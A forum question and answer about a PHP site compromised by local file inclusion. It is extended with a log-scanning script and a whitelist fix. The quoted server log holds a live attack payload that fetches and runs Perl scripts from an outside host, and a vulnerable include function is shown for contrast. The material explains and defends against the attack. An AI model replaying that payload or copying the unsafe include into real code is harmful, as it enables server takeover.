Tags: php, phishing

I have been attacked by PHP/script injection - dummy question


My website has been attacked for phishing purposes. It is a complex website, but I only use POST and PHP files.

How could they have attacked me? I only use $_POST, so I believe no SQL commands or parameters are visible. There is no framework, just my own little code for listing and accessing content on the website.

Any hint/suggestion would be appreciated.

Sorry if I don't reply straight away, but I am dealing with my provider, who has blocked the whole site.

This is their answer (any comment on it will be welcome):

Because script injection attacks the site code itself, it is able to completely avoid webserver security. Unfortunately, some content management systems (especially older versions of Joomla) are extremely susceptible to this form of attack.

A simple way to remove the ability for attackers to use this method is to add a php.ini file at the top level of the website with the following contents. Be aware, though, that the website will need testing afterwards to ensure that no legitimate scripted actions on the site have been affected by the change:

The php.ini directives are:

allow_url_include = "0"
allow_url_fopen = "0"

Update:

Here is what I got from the webhost company:

121.254.216.170 - - [12/Sep/2011:05:21:07 +0100] "GET /?p=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5806 "-" "http://some.thesome.com/etc/byz.jpg? -O /tmp/cmd548;cd /tmp;lwp-download http://some.thesome.com/etc/cup.txt;perl cup.txt;rm -rf *.txt*;wget http://some.thesome.com/etc/update.txt;perl update.txt;rm -rf *.txt*'); echo \"#j13mb0t\"; ?>"
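The log line above shows the actual entry point: the `p` parameter is walked up the directory tree with `../`, ends in a `%00` null byte, points at `/proc/self/environ`, and the payload travels in the User-Agent header. As an added example that is not part of the original post, the PHP script below scans access-log lines in Apache "combined" format for exactly those indicators. The sample lines are constructed for this example (placeholder addresses and `example.invalid`), not taken from a real server. A 200 status only says the request was served; by itself it does not prove the include succeeded, so matching lines still need to be checked against what the page actually returned.

```php
<?php
declare(strict_types=1);

// Added example (not from the original post): flag access-log lines that carry the
// indicators visible in the question's log entry. Sample data below is constructed.

/** Indicator name => regex. Which request field each one is tested against is decided in lfiIndicators(). */
const LFI_INDICATORS = [
    'traversal'    => '~(?:\.\.|%2e%2e)(?:/|%2f)~i',                // ../ in plain or URL-encoded form
    'null-byte'    => '~%00~',                                       // truncated an appended ".php" on old PHP
    'proc-environ' => '~/proc/self/environ~i',                       // exposes the request environment, incl. User-Agent
    'php-in-ua'    => '~<\?(?:php)?|\?>~',                           // PHP tags smuggled in the User-Agent header
    'remote-fetch' => '~\b(?:wget|curl|lwp-download)\s+https?://~i', // download commands in the header
];

/** These indicators inspect the User-Agent string; all others inspect the request path. */
const UA_INDICATORS = ['php-in-ua', 'remote-fetch'];

/** Parse one Apache "combined" log line. Returns null when the line does not match the format. */
function parseCombinedLogLine(string $line): ?array
{
    $pattern = '~^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "(.*)"$~';
    if (!preg_match($pattern, $line, $m)) {
        return null;
    }
    return [
        'ip'     => $m[1],
        'time'   => $m[2],
        'method' => $m[3],
        'path'   => $m[4],
        'status' => (int) $m[5],
        'ua'     => $m[6],
    ];
}

/** Return the names of the indicators that match one parsed request. */
function lfiIndicators(array $req): array
{
    $hits = [];
    foreach (LFI_INDICATORS as $name => $regex) {
        $subject = in_array($name, UA_INDICATORS, true) ? $req['ua'] : $req['path'];
        if (preg_match($regex, $subject) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

/** Scan a list of log lines; returns only the suspicious ones together with their indicators. */
function scanAccessLog(array $lines): array
{
    $report = [];
    foreach ($lines as $line) {
        $req = parseCombinedLogLine($line);
        if ($req === null) {
            continue; // not in combined format: skip rather than guess
        }
        $hits = lfiIndicators($req);
        if ($hits !== []) {
            $report[] = [
                'ip'         => $req['ip'],
                'path'       => $req['path'],
                'status'     => $req['status'],
                'indicators' => $hits,
            ];
        }
    }
    return $report;
}

// Constructed sample log (placeholder addresses): one normal request, one shaped like
// the request in the question, and one URL-encoded variant of the same traversal.
$sampleLog = [
    '198.51.100.7 - - [12/Sep/2011:05:20:59 +0100] "GET /?p=contact HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Sep/2011:05:21:07 +0100] "GET /?p=../../../../../../proc/self/environ%00 HTTP/1.1" 200 5806 "-" "<?php echo \"marker\"; ?>"',
    '203.0.113.9 - - [12/Sep/2011:05:22:41 +0100] "GET /?p=%2e%2e%2f%2e%2e%2fproc%2fself%2fenviron HTTP/1.1" 404 512 "-" "curl/7.21 http://example.invalid/"',
];

foreach (scanAccessLog($sampleLog) as $entry) {
    printf("%-14s HTTP %d  %s\n    indicators: %s\n",
        $entry['ip'], $entry['status'], $entry['path'], implode(', ', $entry['indicators']));
}
```

Run it with `php scan.php` after pasting real log lines into `$sampleLog`; the first sample line produces no report entry, the second matches every path indicator plus `php-in-ua`, and the third shows why the traversal regex also has to accept the `%2e%2e%2f` encoding.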


Solution

  • POST requests can be issued manually too, using cURL for example. There is no one preventing people from just opening a telnet session and issuing the command manually, sending whatever parameters they like to your website.

    Instead, you should always protect your website and validate the input, whether it comes from POST, GET or anywhere else. Also, prefer PDO over the standard mysql functions in PHP.

    Could you elaborate on what kind of attack happened on your website?
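The request in the question's log suggests a front controller that picks a page file from the `p` parameter; whether the asker's site really does `include` that value is an assumption drawn from the log line, not something the question states. As an added example that is neither the asker's code nor the answerer's, the PHP below puts the usual vulnerable pattern next to the validation the answer asks for: the request value becomes a key into a fixed map and never becomes part of a filesystem path, regardless of whether it arrived by GET, POST or a cookie. File names under `pages/` are placeholders.

```php
<?php
declare(strict_types=1);

// Added example (not the asker's code): a page-selection parameter used unsafely,
// and the whitelist version the answer recommends. Page file names are placeholders.

/**
 * Vulnerable pattern, shown for contrast only. The parameter is used as a path, so
 * "../../proc/self/environ%00" walks out of the pages directory, and on PHP before
 * 5.3.4 the null byte cut off the appended ".php". Whatever file was reached was then
 * parsed as PHP, which is why the logged request carried PHP tags in the User-Agent:
 * /proc/self/environ reflects the headers of the current request.
 */
function renderPageUnsafe(string $p): void
{
    include __DIR__ . '/pages/' . $p . '.php';
}

/** Hardened pattern: the only files that can ever be included are the ones listed here. */
const PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
    'about'   => 'about.php',
];

/** Map a request value onto a known page file; anything unknown falls back to the default. */
function resolvePage(?string $p): string
{
    if ($p !== null && array_key_exists($p, PAGES)) {
        return PAGES[$p];
    }
    return PAGES['home'];
}

/** Safe front controller: the request value never touches the path, only the map key does. */
function renderPage(?string $p): void
{
    include __DIR__ . '/pages/' . resolvePage($p);
}

// Demonstration that needs no files on disk: show where each input would resolve.
// Traversal, an embedded null byte, wrong case and a missing parameter all end at the default.
$inputs = ['contact', '../../../../proc/self/environ', "about\0", 'Contact', null];
foreach ($inputs as $input) {
    printf("%-40s -> pages/%s\n", var_export($input, true), resolvePage($input));
}
```

In the real controller the parameter would come from `$_GET['p'] ?? $_POST['p'] ?? null` and go straight into `renderPage()`; `array_key_exists()` does an exact string match, so there is no encoding or case trick that turns an unknown value into a file name. The `allow_url_include` and `allow_url_fopen` settings the provider recommended close off remote includes, but they do nothing against a local path like `/proc/self/environ`; only validating the parameter does.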